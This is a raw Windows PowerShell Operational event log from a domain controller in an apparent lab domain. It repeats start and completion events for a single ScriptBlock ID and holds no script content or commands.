Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473198
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473197
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473196
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473195
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473194
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473193
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473192
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473191
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473190
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473189
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473188
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473187
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473186
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473185
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473184
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473183
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473182
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473181
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473180
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473179
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473178
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473177
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473176
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473175
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473174
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473173
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473172
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473171
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473170
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473169
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473168
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473167
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473166
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473165
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473164
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473163
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473162
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473161
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473160
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473159
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473158
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473157
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473156
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473155
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473154
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473153
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473152
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473151
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473150
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473149
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473148
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473147
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473146
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473145
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
